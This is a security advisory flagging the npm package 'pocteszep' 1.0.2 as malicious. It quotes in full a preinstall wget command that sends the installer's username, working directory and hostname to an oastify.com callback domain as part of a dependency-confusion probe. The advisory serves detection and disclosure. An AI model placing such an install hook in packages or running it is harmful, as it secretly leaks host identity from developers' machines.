The package's npm preinstall lifecycle script runs wget --quiet "http://78dngdm3dhrrj8zgfm4es9m8bzhq5jt8.oastify.com/?user=$(whoami)&path=$(pwd)&hostname=$(hostname)" (package.json line 8). On npm install, before any code review, the installer's username, current working directory, and hostname are sent over plaintext HTTP to a Burp Collaborator (oastify.com) callback subdomain — a typical out-of-band exfiltration channel used in dependency-confusion attacks. The package description self-identifies as a 'Simple PoC package for testing for dependency confusion vulnerabilities,' and the package contains no legitimate functionality beyond the lifecycle beacon. Any installer pulling this package via name-collision with an internal dependency leaks host identity to the attacker.

The OpenSSF Package Analysis project identified 'pocteszep' @ 1.0.2 (npm) as malicious.

It is considered malicious because:

• The package communicates with a domain associated with malicious activity.

• The package executes one or more commands associated with malicious behavior.